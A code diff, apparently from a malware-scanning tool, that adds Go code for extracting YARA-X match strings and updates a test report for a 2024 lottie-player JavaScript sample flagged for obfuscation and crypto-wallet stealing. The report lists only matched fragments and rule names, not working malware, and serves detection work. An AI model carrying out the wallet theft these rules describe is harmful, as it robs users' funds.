interned + } + sp.RUnlock() + + sp.Lock() + defer sp.Unlock() + + if interned, ok := sp.strings[s]; ok { + return interned + } + + sp.strings[s] = s + return s +} + +var BufferPool = sync.Pool{ + New: func() interface{} { + return make([]byte, 0, 1024) + }, +} + +type matchProcessor struct { + fc []byte + pool *StringPool + matches []yarax.Match +} + +func newMatchProcessor(fc []byte, matches []yarax.Match) *matchProcessor { + return &matchProcessor{ + fc: fc, + pool: NewStringPool(len(matches)), + matches: matches, + } +} + +var matchResultPool = sync.Pool{ + New: func() interface{} { + s := make([]string, 0, 32) + return &s + }, +} + +// process performantly handles the conversion of matched data to strings. +// yara-x does not expose the rendered string via the API due to performance overhead. +func (mp *matchProcessor) process() []string { + if len(mp.matches) == 0 { + return nil + } + + var result *[]string + var ok bool + if result, ok = matchResultPool.Get().(*[]string); ok { + *result = (*result)[:0] + } else { + slice := make([]string, 0, 32) + result = &slice + } + defer matchResultPool.Put(result) + + var buffer *[]byte + if tmp := BufferPool.Get(); tmp != nil { + if b, ok := tmp.(*[]byte); ok { + buffer = b + } else { + slice := make([]byte, 0, 32) + buffer = &slice + } + } + defer BufferPool.Put(buffer) + + for i := 0; i < len(mp.matches); i += batchSize { + end := i + batchSize + if end > len(mp.matches) { + end = len(mp.matches) + } + + // #nosec G115 // ignore converting uint64 values to int + for _, match := range mp.matches[i:end] { + l := int(match.Length()) + o := int(match.Offset()) + + if o < 0 || o+l > len(mp.fc) { + continue + } + + matchBytes := mp.fc[o : o+l] + if !containsUnprintable(matchBytes) { + str := mp.pool.Intern(string(matchBytes)) + *result = append(*result, str) + } + } + } + + return *result +} + +// containsUnprintable determines if a byte is a valid character. +func containsUnprintable(b []byte) bool { + for _, c := range b { + if c < 32 || c > 126 { + return true + } + } + return false +} diff --git a/tests/javascript/2024.lottie-player/lottie-player.min.js.mdiff b/tests/javascript/2024.lottie-player/lottie-player.min.js.mdiff index 1f771890d..3618b8781 100644 --- a/tests/javascript/2024.lottie-player/lottie-player.min.js.mdiff +++ b/tests/javascript/2024.lottie-player/lottie-player.min.js.mdiff @@ -4,55 +4,55 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |--|--|--|--| -| +CRITICAL | **[anti-static/obfuscation/js](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/js.yara#ebe)** | highly obfuscated javascript (eBe) | [charCodeAt](https://github.com/search?q=charCodeAt&type=code)
[eBe(-1)](https://github.com/search?q=eBe%28-1%29&type=code)
[eBe(-10)](https://github.com/search?q=eBe%28-10%29&type=code)
[eBe(-11)](https://github.com/search?q=eBe%28-11%29&type=code)
[eBe(-12)](https://github.com/search?q=eBe%28-12%29&type=code)
[eBe(-13)](https://github.com/search?q=eBe%28-13%29&type=code)
[eBe(-14)](https://github.com/search?q=eBe%28-14%29&type=code)
[eBe(-15)](https://github.com/search?q=eBe%28-15%29&type=code)
[eBe(-16)](https://github.com/search?q=eBe%28-16%29&type=code)
[eBe(-17)](https://github.com/search?q=eBe%28-17%29&type=code)
[eBe(-18)](https://github.com/search?q=eBe%28-18%29&type=code)
[eBe(-19)](https://github.com/search?q=eBe%28-19%29&type=code)
[eBe(-2)](https://github.com/search?q=eBe%28-2%29&type=code)
[eBe(-20)](https://github.com/search?q=eBe%28-20%29&type=code)
[eBe(-21)](https://github.com/search?q=eBe%28-21%29&type=code)
[eBe(-22)](https://github.com/search?q=eBe%28-22%29&type=code)
[eBe(-23)](https://github.com/search?q=eBe%28-23%29&type=code)
[eBe(-24)](https://github.com/search?q=eBe%28-24%29&type=code)
[eBe(-25)](https://github.com/search?q=eBe%28-25%29&type=code)
[eBe(-26)](https://github.com/search?q=eBe%28-26%29&type=code)
[eBe(-27)](https://github.com/search?q=eBe%28-27%29&type=code)
[eBe(-28)](https://github.com/search?q=eBe%28-28%29&type=code)
[eBe(-29)](https://github.com/search?q=eBe%28-29%29&type=code)
[eBe(-3)](https://github.com/search?q=eBe%28-3%29&type=code)
[eBe(-30)](https://github.com/search?q=eBe%28-30%29&type=code)
[eBe(-31)](https://github.com/search?q=eBe%28-31%29&type=code)
[eBe(-32)](https://github.com/search?q=eBe%28-32%29&type=code)
[eBe(-4)](https://github.com/search?q=eBe%28-4%29&type=code)
[eBe(-5)](https://github.com/search?q=eBe%28-5%29&type=code)
[eBe(-6)](https://github.com/search?q=eBe%28-6%29&type=code)
[eBe(-7)](https://github.com/search?q=eBe%28-7%29&type=code)
[eBe(-8)](https://github.com/search?q=eBe%28-8%29&type=code)
[eBe(-9)](https://github.com/search?q=eBe%28-9%29&type=code)
[function(](https://github.com/search?q=function%28&type=code) | -| +CRITICAL | **[exfil/stealer/wallet](https://github.com/chainguard-dev/malcontent/blob/main/rules/exfil/stealer/wallet.yara#crypto_stealer_names)** | makes HTTPS connections and references multiple wallets by name | [BraveWallet](https://github.com/search?q=BraveWallet&type=code)
[CoinbaseBrowser](https://github.com/search?q=CoinbaseBrowser&type=code)
[CoinbaseConnector](https://github.com/search?q=CoinbaseConnector&type=code)
[CoinbaseInjectedProvider](https://github.com/search?q=CoinbaseInjectedProvider&type=code)
[CoinbaseInjectedSigner](https://github.com/search?q=CoinbaseInjectedSigner&type=code)
[CoinbaseOnRampURL](https://github.com/search?q=CoinbaseOnRampURL&type=code)
[CoinbaseTransactions](https://github.com/search?q=CoinbaseTransactions&type=code)
[CoinbaseWalletDeeplink](https://github.com/search?q=CoinbaseWalletDeeplink&type=code)
[CoinbaseWalletLogo](https://github.com/search?q=CoinbaseWalletLogo&type=code)
[CoinbaseWalletProvider](https://github.com/search?q=CoinbaseWalletProvider&type=code)
[CoinbaseWalletRound](https://github.com/search?q=CoinbaseWalletRound&type=code)
[CoinbaseWalletSDK](https://github.com/search?q=CoinbaseWalletSDK&type=code)
[CoinbaseWalletSteps](https://github.com/search?q=CoinbaseWalletSteps&type=code)
[Coinbase_Wordmark_SubBrands_ALL](https://github.com/search?q=Coinbase_Wordmark_SubBrands_ALL&type=code)
[Ronin](https://github.com/search?q=Ronin&type=code)
[http](https://github.com/search?q=http&type=code) | -| +HIGH | **[anti-static/obfuscation/bitwise](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/bitwise.yara#unsigned_bitwise_math_excess)** | [uses an excessive amount of unsigned bitwise math](https://www.reversinglabs.com/blog/python-downloader-highlights-noise-problem-in-open-source-threat-detection) | [a>>>0](https://github.com/search?q=a%3E%3E%3E0&type=code)
[a>>>11](https://github.com/search?q=a%3E%3E%3E11&type=code)
[a>>>13](https://github.com/search?q=a%3E%3E%3E13&type=code)
[a>>>15](https://github.com/search?q=a%3E%3E%3E15&type=code)
[a>>>16](https://github.com/search?q=a%3E%3E%3E16&type=code)
[a>>>22](https://github.com/search?q=a%3E%3E%3E22&type=code)
[a>>>24](https://github.com/search?q=a%3E%3E%3E24&type=code)
[a>>>25](https://github.com/search?q=a%3E%3E%3E25&type=code)
[a>>>26](https://github.com/search?q=a%3E%3E%3E26&type=code)
[a>>>31](https://github.com/search?q=a%3E%3E%3E31&type=code)
[a>>>32](https://github.com/search?q=a%3E%3E%3E32&type=code)
[a>>>6](https://github.com/search?q=a%3E%3E%3E6&type=code)
[a>>>8](https://github.com/search?q=a%3E%3E%3E8&type=code)
[b>>>0](https://github.com/search?q=b%3E%3E%3E0&type=code)
[b>>>29](https://github.com/search?q=b%3E%3E%3E29&type=code)
[b>>>31](https://github.com/search?q=b%3E%3E%3E31&type=code)
[c>>>0](https://github.com/search?q=c%3E%3E%3E0&type=code)
[c>>>16](https://github.com/search?q=c%3E%3E%3E16&type=code)
[c>>>24](https://github.com/search?q=c%3E%3E%3E24&type=code)
[c>>>31](https://github.com/search?q=c%3E%3E%3E31&type=code)
[c>>>5](https://github.com/search?q=c%3E%3E%3E5&type=code)
[c>>>8](https://github.com/search?q=c%3E%3E%3E8&type=code)
[charAt(a](https://github.com/search?q=charAt%28a&type=code)
[charAt(c](https://github.com/search?q=charAt%28c&type=code)
[charAt(n](https://github.com/search?q=charAt%28n&type=code)
[charAt(s](https://github.com/search?q=charAt%28s&type=code)
[charAt(t](https://github.com/search?q=charAt%28t&type=code)
[charAt(u](https://github.com/search?q=charAt%28u&type=code)
[charAt(w](https://github.com/search?q=charAt%28w&type=code)
[d>>>16](https://github.com/search?q=d%3E%3E%3E16&type=code)
[d>>>24](https://github.com/search?q=d%3E%3E%3E24&type=code)
[d>>>26](https://github.com/search?q=d%3E%3E%3E26&type=code)
[d>>>29](https://github.com/search?q=d%3E%3E%3E29&type=code)
[d>>>31](https://github.com/search?q=d%3E%3E%3E31&type=code)
[d>>>6](https://github.com/search?q=d%3E%3E%3E6&type=code)
[d>>>7](https://github.com/search?q=d%3E%3E%3E7&type=code)
[d>>>8](https://github.com/search?q=d%3E%3E%3E8&type=code)
[e>>>0](https://github.com/search?q=e%3E%3E%3E0&type=code)
[e>>>10](https://github.com/search?q=e%3E%3E%3E10&type=code)
[e>>>11](https://github.com/search?q=e%3E%3E%3E11&type=code)
[e>>>12](https://github.com/search?q=e%3E%3E%3E12&type=code)
[e>>>13](https://github.com/search?q=e%3E%3E%3E13&type=code)
[e>>>14](https://github.com/search?q=e%3E%3E%3E14&type=code)
[e>>>16](https://github.com/search?q=e%3E%3E%3E16&type=code)
[e>>>17](https://github.com/search?q=e%3E%3E%3E17&type=code)
[e>>>18](https://github.com/search?q=e%3E%3E%3E18&type=code)
[e>>>19](https://github.com/search?q=e%3E%3E%3E19&type=code)
[e>>>22](https://github.com/search?q=e%3E%3E%3E22&type=code)
[e>>>24](https://github.com/search?q=e%3E%3E%3E24&type=code)
[e>>>25](https://github.com/search?q=e%3E%3E%3E25&type=code)
[e>>>26](https://github.com/search?q=e%3E%3E%3E26&type=code)
[e>>>27](https://github.com/search?q=e%3E%3E%3E27&type=code)
[e>>>28](https://github.com/search?q=e%3E%3E%3E28&type=code)
[e>>>29](https://github.com/search?q=e%3E%3E%3E29&type=code)
[e>>>31](https://github.com/search?q=e%3E%3E%3E31&type=code)
[e>>>32](https://github.com/search?q=e%3E%3E%3E32&type=code)
[e>>>4](https://github.com/search?q=e%3E%3E%3E4&type=code)
[e>>>5](https://github.com/search?q=e%3E%3E%3E5&type=code)
[e>>>64](https://github.com/search?q=e%3E%3E%3E64&type=code)
[e>>>7](https://github.com/search?q=e%3E%3E%3E7&type=code)
[e>>>8](https://github.com/search?q=e%3E%3E%3E8&type=code)
[f>>>13](https://github.com/search?q=f%3E%3E%3E13&type=code)
[f>>>24](https://github.com/search?q=f%3E%3E%3E24&type=code)
[f>>>31](https://github.com/search?q=f%3E%3E%3E31&type=code)
[f>>>8](https://github.com/search?q=f%3E%3E%3E8&type=code)
[function(](https://github.com/search?q=function%28&type=code)
[g>>>16](https://github.com/search?q=g%3E%3E%3E16&type=code)
[h>>>11](https://github.com/search?q=h%3E%3E%3E11&type=code)
[h>>>16](https://github.com/search?q=h%3E%3E%3E16&type=code)
[h>>>19](https://github.com/search?q=h%3E%3E%3E19&type=code)
[h>>>24](https://github.com/search?q=h%3E%3E%3E24&type=code)
[h>>>25](https://github.com/search?q=h%3E%3E%3E25&type=code)
[h>>>29](https://github.com/search?q=h%3E%3E%3E29&type=code)
[h>>>31](https://github.com/search?q=h%3E%3E%3E31&type=code)
[h>>>6](https://github.com/search?q=h%3E%3E%3E6&type=code)
[h>>>7](https://github.com/search?q=h%3E%3E%3E7&type=code)
[h>>>8](https://github.com/search?q=h%3E%3E%3E8&type=code)
[i>>>0](https://github.com/search?q=i%3E%3E%3E0&type=code)
[i>>>10](https://github.com/search?q=i%3E%3E%3E10&type=code)
[i>>>13](https://github.com/search?q=i%3E%3E%3E13&type=code)
[i>>>16](https://github.com/search?q=i%3E%3E%3E16&type=code)
[i>>>22](https://github.com/search?q=i%3E%3E%3E22&type=code)
[i>>>27](https://github.com/search?q=i%3E%3E%3E27&type=code)
[i>>>31](https://github.com/search?q=i%3E%3E%3E31&type=code)
[i>>>5](https://github.com/search?q=i%3E%3E%3E5&type=code)
[j>>>21](https://github.com/search?q=j%3E%3E%3E21&type=code)
[k>>>20](https://github.com/search?q=k%3E%3E%3E20&type=code)
[k>>>4](https://github.com/search?q=k%3E%3E%3E4&type=code)
[l>>>0](https://github.com/search?q=l%3E%3E%3E0&type=code)
[l>>>26](https://github.com/search?q=l%3E%3E%3E26&type=code)
[l>>>31](https://github.com/search?q=l%3E%3E%3E31&type=code)
[l>>>8](https://github.com/search?q=l%3E%3E%3E8&type=code)
[m>>>0](https://github.com/search?q=m%3E%3E%3E0&type=code)
[m>>>10](https://github.com/search?q=m%3E%3E%3E10&type=code)
[m>>>13](https://github.com/search?q=m%3E%3E%3E13&type=code)
[m>>>17](https://github.com/search?q=m%3E%3E%3E17&type=code)
[m>>>19](https://github.com/search?q=m%3E%3E%3E19&type=code)
[n>>>0](https://github.com/search?q=n%3E%3E%3E0&type=code)
[n>>>13](https://github.com/search?q=n%3E%3E%3E13&type=code)
[n>>>16](https://github.com/search?q=n%3E%3E%3E16&type=code)
[n>>>17](https://github.com/search?q=n%3E%3E%3E17&type=code)
[n>>>24](https://github.com/search?q=n%3E%3E%3E24&type=code)
[n>>>26](https://github.com/search?q=n%3E%3E%3E26&type=code)
[n>>>31](https://github.com/search?q=n%3E%3E%3E31&type=code)
[n>>>5](https://github.com/search?q=n%3E%3E%3E5&type=code)
[n>>>7](https://github.com/search?q=n%3E%3E%3E7&type=code)
[n>>>8](https://github.com/search?q=n%3E%3E%3E8&type=code)
[o>>>0](https://github.com/search?q=o%3E%3E%3E0&type=code)
[o>>>10](https://github.com/search?q=o%3E%3E%3E10&type=code)
[o>>>16](https://github.com/search?q=o%3E%3E%3E16&type=code)
[o>>>22](https://github.com/search?q=o%3E%3E%3E22&type=code)
[o>>>24](https://github.com/search?q=o%3E%3E%3E24&type=code)
[o>>>31](https://github.com/search?q=o%3E%3E%3E31&type=code)
[o>>>4](https://github.com/search?q=o%3E%3E%3E4&type=code)
[o>>>5](https://github.com/search?q=o%3E%3E%3E5&type=code)
[o>>>8](https://github.com/search?q=o%3E%3E%3E8&type=code)
[p>>>0](https://github.com/search?q=p%3E%3E%3E0&type=code)
[p>>>18](https://github.com/search?q=p%3E%3E%3E18&type=code)
[p>>>31](https://github.com/search?q=p%3E%3E%3E31&type=code)
[p>>>7](https://github.com/search?q=p%3E%3E%3E7&type=code)
[p>>>8](https://github.com/search?q=p%3E%3E%3E8&type=code)
[q>>>0](https://github.com/search?q=q%3E%3E%3E0&type=code)
[q>>>3](https://github.com/search?q=q%3E%3E%3E3&type=code)
[r>>>0](https://github.com/search?q=r%3E%3E%3E0&type=code)
[r>>>10](https://github.com/search?q=r%3E%3E%3E10&type=code)
[r>>>13](https://github.com/search?q=r%3E%3E%3E13&type=code)
[r>>>24](https://github.com/search?q=r%3E%3E%3E24&type=code)
[r>>>8](https://github.com/search?q=r%3E%3E%3E8&type=code)
[s>>>0](https://github.com/search?q=s%3E%3E%3E0&type=code)
[s>>>14](https://github.com/search?q=s%3E%3E%3E14&type=code)
[s>>>24](https://github.com/search?q=s%3E%3E%3E24&type=code)
[s>>>26](https://github.com/search?q=s%3E%3E%3E26&type=code)
[s>>>31](https://github.com/search?q=s%3E%3E%3E31&type=code)
[s>>>6](https://github.com/search?q=s%3E%3E%3E6&type=code)
[s>>>8](https://github.com/search?q=s%3E%3E%3E8&type=code)
[t>>>0](https://github.com/search?q=t%3E%3E%3E0&type=code)
[t>>>16](https://github.com/search?q=t%3E%3E%3E16&type=code)
[t>>>26](https://github.com/search?q=t%3E%3E%3E26&type=code)
[t>>>29](https://github.com/search?q=t%3E%3E%3E29&type=code)
[t>>>32](https://github.com/search?q=t%3E%3E%3E32&type=code)
[t>>>64](https://github.com/search?q=t%3E%3E%3E64&type=code)
[t>>>7](https://github.com/search?q=t%3E%3E%3E7&type=code)
[t>>>9](https://github.com/search?q=t%3E%3E%3E9&type=code)
[u>>>13](https://github.com/search?q=u%3E%3E%3E13&type=code)
[u>>>16](https://github.com/search?q=u%3E%3E%3E16&type=code)
[u>>>24](https://github.com/search?q=u%3E%3E%3E24&type=code)
[u>>>31](https://github.com/search?q=u%3E%3E%3E31&type=code)
[u>>>8](https://github.com/search?q=u%3E%3E%3E8&type=code)
[v>>>0](https://github.com/search?q=v%3E%3E%3E0&type=code)
[v>>>16](https://github.com/search?q=v%3E%3E%3E16&type=code)
[v>>>24](https://github.com/search?q=v%3E%3E%3E24&type=code)
[v>>>28](https://github.com/search?q=v%3E%3E%3E28&type=code)
[v>>>8](https://github.com/search?q=v%3E%3E%3E8&type=code)
[w>>>10](https://github.com/search?q=w%3E%3E%3E10&type=code)
[w>>>17](https://github.com/search?q=w%3E%3E%3E17&type=code)
[w>>>18](https://github.com/search?q=w%3E%3E%3E18&type=code)
[w>>>19](https://github.com/search?q=w%3E%3E%3E19&type=code)
[w>>>28](https://github.com/search?q=w%3E%3E%3E28&type=code)
[w>>>3](https://github.com/search?q=w%3E%3E%3E3&type=code)
[w>>>7](https://github.com/search?q=w%3E%3E%3E7&type=code)
[x>>>14](https://github.com/search?q=x%3E%3E%3E14&type=code)
[x>>>18](https://github.com/search?q=x%3E%3E%3E18&type=code)
[x>>>23](https://github.com/search?q=x%3E%3E%3E23&type=code)
[x>>>9](https://github.com/search?q=x%3E%3E%3E9&type=code)
[y>>>13](https://github.com/search?q=y%3E%3E%3E13&type=code)
[y>>>29](https://github.com/search?q=y%3E%3E%3E29&type=code)
[y>>>31](https://github.com/search?q=y%3E%3E%3E31&type=code)
[z>>>0](https://github.com/search?q=z%3E%3E%3E0&type=code)
[z>>>17](https://github.com/search?q=z%3E%3E%3E17&type=code) | +| +CRITICAL | **[anti-static/obfuscation/js](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/js.yara#ebe)** | highly obfuscated javascript (eBe) | [charCodeAt](https://github.com/search?q=charCodeAt&type=code)
[function(](https://github.com/search?q=function%28&type=code)
[eBe(-10)](https://github.com/search?q=eBe%28-10%29&type=code)
[eBe(-11)](https://github.com/search?q=eBe%28-11%29&type=code)
[eBe(-12)](https://github.com/search?q=eBe%28-12%29&type=code)
[eBe(-13)](https://github.com/search?q=eBe%28-13%29&type=code)
[eBe(-14)](https://github.com/search?q=eBe%28-14%29&type=code)
[eBe(-15)](https://github.com/search?q=eBe%28-15%29&type=code)
[eBe(-16)](https://github.com/search?q=eBe%28-16%29&type=code)
[eBe(-17)](https://github.com/search?q=eBe%28-17%29&type=code)
[eBe(-18)](https://github.com/search?q=eBe%28-18%29&type=code)
[eBe(-19)](https://github.com/search?q=eBe%28-19%29&type=code)
[eBe(-20)](https://github.com/search?q=eBe%28-20%29&type=code)
[eBe(-21)](https://github.com/search?q=eBe%28-21%29&type=code)
[eBe(-22)](https://github.com/search?q=eBe%28-22%29&type=code)
[eBe(-23)](https://github.com/search?q=eBe%28-23%29&type=code)
[eBe(-24)](https://github.com/search?q=eBe%28-24%29&type=code)
[eBe(-25)](https://github.com/search?q=eBe%28-25%29&type=code)
[eBe(-26)](https://github.com/search?q=eBe%28-26%29&type=code)
[eBe(-27)](https://github.com/search?q=eBe%28-27%29&type=code)
[eBe(-28)](https://github.com/search?q=eBe%28-28%29&type=code)
[eBe(-29)](https://github.com/search?q=eBe%28-29%29&type=code)
[eBe(-30)](https://github.com/search?q=eBe%28-30%29&type=code)
[eBe(-31)](https://github.com/search?q=eBe%28-31%29&type=code)
[eBe(-32)](https://github.com/search?q=eBe%28-32%29&type=code)
[eBe(-1)](https://github.com/search?q=eBe%28-1%29&type=code)
[eBe(-2)](https://github.com/search?q=eBe%28-2%29&type=code)
[eBe(-3)](https://github.com/search?q=eBe%28-3%29&type=code)
[eBe(-4)](https://github.com/search?q=eBe%28-4%29&type=code)
[eBe(-5)](https://github.com/search?q=eBe%28-5%29&type=code)
[eBe(-6)](https://github.com/search?q=eBe%28-6%29&type=code)
[eBe(-7)](https://github.com/search?q=eBe%28-7%29&type=code)
[eBe(-8)](https://github.com/search?q=eBe%28-8%29&type=code)
[eBe(-9)](https://github.com/search?q=eBe%28-9%29&type=code) | +| +CRITICAL | **[exfil/stealer/wallet](https://github.com/chainguard-dev/malcontent/blob/main/rules/exfil/stealer/wallet.yara#crypto_stealer_names)** | makes HTTPS connections and references multiple wallets by name | [Coinbase_Wordmark_SubBrands_ALL](https://github.com/search?q=Coinbase_Wordmark_SubBrands_ALL&type=code)
[CoinbaseInjectedProvider](https://github.com/search?q=CoinbaseInjectedProvider&type=code)
[CoinbaseInjectedSigner](https://github.com/search?q=CoinbaseInjectedSigner&type=code)
[CoinbaseWalletDeeplink](https://github.com/search?q=CoinbaseWalletDeeplink&type=code)
[CoinbaseWalletProvider](https://github.com/search?q=CoinbaseWalletProvider&type=code)
[CoinbaseTransactions](https://github.com/search?q=CoinbaseTransactions&type=code)
[CoinbaseWalletRound](https://github.com/search?q=CoinbaseWalletRound&type=code)
[CoinbaseWalletSteps](https://github.com/search?q=CoinbaseWalletSteps&type=code)
[CoinbaseWalletLogo](https://github.com/search?q=CoinbaseWalletLogo&type=code)
[CoinbaseConnector](https://github.com/search?q=CoinbaseConnector&type=code)
[CoinbaseOnRampURL](https://github.com/search?q=CoinbaseOnRampURL&type=code)
[CoinbaseWalletSDK](https://github.com/search?q=CoinbaseWalletSDK&type=code)
[CoinbaseBrowser](https://github.com/search?q=CoinbaseBrowser&type=code)
[BraveWallet](https://github.com/search?q=BraveWallet&type=code)
[Ronin](https://github.com/search?q=Ronin&type=code)
[http](https://github.com/search?q=http&type=code) | +| +HIGH | **[anti-static/obfuscation/bitwise](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/bitwise.yara#unsigned_bitwise_math_excess)** | [uses an excessive amount of unsigned bitwise math](https://www.reversinglabs.com/blog/python-downloader-highlights-noise-problem-in-open-source-threat-detection) | [function(](https://github.com/search?q=function%28&type=code)
[charAt(a](https://github.com/search?q=charAt%28a&type=code)
[charAt(c](https://github.com/search?q=charAt%28c&type=code)
[charAt(n](https://github.com/search?q=charAt%28n&type=code)
[charAt(s](https://github.com/search?q=charAt%28s&type=code)
[charAt(t](https://github.com/search?q=charAt%28t&type=code)
[charAt(u](https://github.com/search?q=charAt%28u&type=code)
[charAt(w](https://github.com/search?q=charAt%28w&type=code)
[a>>>11](https://github.com/search?q=a%3E%3E%3E11&type=code)
[a>>>13](https://github.com/search?q=a%3E%3E%3E13&type=code)
[a>>>15](https://github.com/search?q=a%3E%3E%3E15&type=code)
[a>>>16](https://github.com/search?q=a%3E%3E%3E16&type=code)
[a>>>22](https://github.com/search?q=a%3E%3E%3E22&type=code)
[a>>>24](https://github.com/search?q=a%3E%3E%3E24&type=code)
[a>>>25](https://github.com/search?q=a%3E%3E%3E25&type=code)
[a>>>26](https://github.com/search?q=a%3E%3E%3E26&type=code)
[a>>>31](https://github.com/search?q=a%3E%3E%3E31&type=code)
[a>>>32](https://github.com/search?q=a%3E%3E%3E32&type=code)
[b>>>29](https://github.com/search?q=b%3E%3E%3E29&type=code)
[b>>>31](https://github.com/search?q=b%3E%3E%3E31&type=code)
[c>>>16](https://github.com/search?q=c%3E%3E%3E16&type=code)
[c>>>24](https://github.com/search?q=c%3E%3E%3E24&type=code)
[c>>>31](https://github.com/search?q=c%3E%3E%3E31&type=code)
[d>>>16](https://github.com/search?q=d%3E%3E%3E16&type=code)
[d>>>24](https://github.com/search?q=d%3E%3E%3E24&type=code)
[d>>>26](https://github.com/search?q=d%3E%3E%3E26&type=code)
[d>>>29](https://github.com/search?q=d%3E%3E%3E29&type=code)
[d>>>31](https://github.com/search?q=d%3E%3E%3E31&type=code)
[e>>>10](https://github.com/search?q=e%3E%3E%3E10&type=code)
[e>>>11](https://github.com/search?q=e%3E%3E%3E11&type=code)
[e>>>12](https://github.com/search?q=e%3E%3E%3E12&type=code)
[e>>>13](https://github.com/search?q=e%3E%3E%3E13&type=code)
[e>>>14](https://github.com/search?q=e%3E%3E%3E14&type=code)
[e>>>16](https://github.com/search?q=e%3E%3E%3E16&type=code)
[e>>>17](https://github.com/search?q=e%3E%3E%3E17&type=code)
[e>>>18](https://github.com/search?q=e%3E%3E%3E18&type=code)
[e>>>19](https://github.com/search?q=e%3E%3E%3E19&type=code)
[e>>>22](https://github.com/search?q=e%3E%3E%3E22&type=code)
[e>>>24](https://github.com/search?q=e%3E%3E%3E24&type=code)
[e>>>25](https://github.com/search?q=e%3E%3E%3E25&type=code)
[e>>>26](https://github.com/search?q=e%3E%3E%3E26&type=code)
[e>>>27](https://github.com/search?q=e%3E%3E%3E27&type=code)
[e>>>28](https://github.com/search?q=e%3E%3E%3E28&type=code)
[e>>>29](https://github.com/search?q=e%3E%3E%3E29&type=code)
[e>>>31](https://github.com/search?q=e%3E%3E%3E31&type=code)
[e>>>32](https://github.com/search?q=e%3E%3E%3E32&type=code)
[e>>>64](https://github.com/search?q=e%3E%3E%3E64&type=code)
[f>>>13](https://github.com/search?q=f%3E%3E%3E13&type=code)
[f>>>24](https://github.com/search?q=f%3E%3E%3E24&type=code)
[f>>>31](https://github.com/search?q=f%3E%3E%3E31&type=code)
[g>>>16](https://github.com/search?q=g%3E%3E%3E16&type=code)
[h>>>11](https://github.com/search?q=h%3E%3E%3E11&type=code)
[h>>>16](https://github.com/search?q=h%3E%3E%3E16&type=code)
[h>>>19](https://github.com/search?q=h%3E%3E%3E19&type=code)
[h>>>24](https://github.com/search?q=h%3E%3E%3E24&type=code)
[h>>>25](https://github.com/search?q=h%3E%3E%3E25&type=code)
[h>>>29](https://github.com/search?q=h%3E%3E%3E29&type=code)
[h>>>31](https://github.com/search?q=h%3E%3E%3E31&type=code)
[i>>>10](https://github.com/search?q=i%3E%3E%3E10&type=code)
[i>>>13](https://github.com/search?q=i%3E%3E%3E13&type=code)
[i>>>16](https://github.com/search?q=i%3E%3E%3E16&type=code)
[i>>>22](https://github.com/search?q=i%3E%3E%3E22&type=code)
[i>>>27](https://github.com/search?q=i%3E%3E%3E27&type=code)
[i>>>31](https://github.com/search?q=i%3E%3E%3E31&type=code)
[j>>>21](https://github.com/search?q=j%3E%3E%3E21&type=code)
[k>>>20](https://github.com/search?q=k%3E%3E%3E20&type=code)
[l>>>26](https://github.com/search?q=l%3E%3E%3E26&type=code)
[l>>>31](https://github.com/search?q=l%3E%3E%3E31&type=code)
[m>>>10](https://github.com/search?q=m%3E%3E%3E10&type=code)
[m>>>13](https://github.com/search?q=m%3E%3E%3E13&type=code)
[m>>>17](https://github.com/search?q=m%3E%3E%3E17&type=code)
[m>>>19](https://github.com/search?q=m%3E%3E%3E19&type=code)
[n>>>13](https://github.com/search?q=n%3E%3E%3E13&type=code)
[n>>>16](https://github.com/search?q=n%3E%3E%3E16&type=code)
[n>>>17](https://github.com/search?q=n%3E%3E%3E17&type=code)
[n>>>24](https://github.com/search?q=n%3E%3E%3E24&type=code)
[n>>>26](https://github.com/search?q=n%3E%3E%3E26&type=code)
[n>>>31](https://github.com/search?q=n%3E%3E%3E31&type=code)
[o>>>10](https://github.com/search?q=o%3E%3E%3E10&type=code)
[o>>>16](https://github.com/search?q=o%3E%3E%3E16&type=code)
[o>>>22](https://github.com/search?q=o%3E%3E%3E22&type=code)
[o>>>24](https://github.com/search?q=o%3E%3E%3E24&type=code)
[o>>>31](https://github.com/search?q=o%3E%3E%3E31&type=code)
[p>>>18](https://github.com/search?q=p%3E%3E%3E18&type=code)
[p>>>31](https://github.com/search?q=p%3E%3E%3E31&type=code)
[r>>>10](https://github.com/search?q=r%3E%3E%3E10&type=code)
[r>>>13](https://github.com/search?q=r%3E%3E%3E13&type=code)
[r>>>24](https://github.com/search?q=r%3E%3E%3E24&type=code)
[s>>>14](https://github.com/search?q=s%3E%3E%3E14&type=code)
[s>>>24](https://github.com/search?q=s%3E%3E%3E24&type=code)
[s>>>26](https://github.com/search?q=s%3E%3E%3E26&type=code)
[s>>>31](https://github.com/search?q=s%3E%3E%3E31&type=code)
[t>>>16](https://github.com/search?q=t%3E%3E%3E16&type=code)
[t>>>26](https://github.com/search?q=t%3E%3E%3E26&type=code)
[t>>>29](https://github.com/search?q=t%3E%3E%3E29&type=code)
[t>>>32](https://github.com/search?q=t%3E%3E%3E32&type=code)
[t>>>64](https://github.com/search?q=t%3E%3E%3E64&type=code)
[u>>>13](https://github.com/search?q=u%3E%3E%3E13&type=code)
[u>>>16](https://github.com/search?q=u%3E%3E%3E16&type=code)
[u>>>24](https://github.com/search?q=u%3E%3E%3E24&type=code)
[u>>>31](https://github.com/search?q=u%3E%3E%3E31&type=code)
[v>>>16](https://github.com/search?q=v%3E%3E%3E16&type=code)
[v>>>24](https://github.com/search?q=v%3E%3E%3E24&type=code)
[v>>>28](https://github.com/search?q=v%3E%3E%3E28&type=code)
[w>>>10](https://github.com/search?q=w%3E%3E%3E10&type=code)
[w>>>17](https://github.com/search?q=w%3E%3E%3E17&type=code)
[w>>>18](https://github.com/search?q=w%3E%3E%3E18&type=code)
[w>>>19](https://github.com/search?q=w%3E%3E%3E19&type=code)
[w>>>28](https://github.com/search?q=w%3E%3E%3E28&type=code)
[x>>>14](https://github.com/search?q=x%3E%3E%3E14&type=code)
[x>>>18](https://github.com/search?q=x%3E%3E%3E18&type=code)
[x>>>23](https://github.com/search?q=x%3E%3E%3E23&type=code)
[y>>>13](https://github.com/search?q=y%3E%3E%3E13&type=code)
[y>>>29](https://github.com/search?q=y%3E%3E%3E29&type=code)
[y>>>31](https://github.com/search?q=y%3E%3E%3E31&type=code)
[z>>>17](https://github.com/search?q=z%3E%3E%3E17&type=code)
[a>>>0](https://github.com/search?q=a%3E%3E%3E0&type=code)
[a>>>6](https://github.com/search?q=a%3E%3E%3E6&type=code)
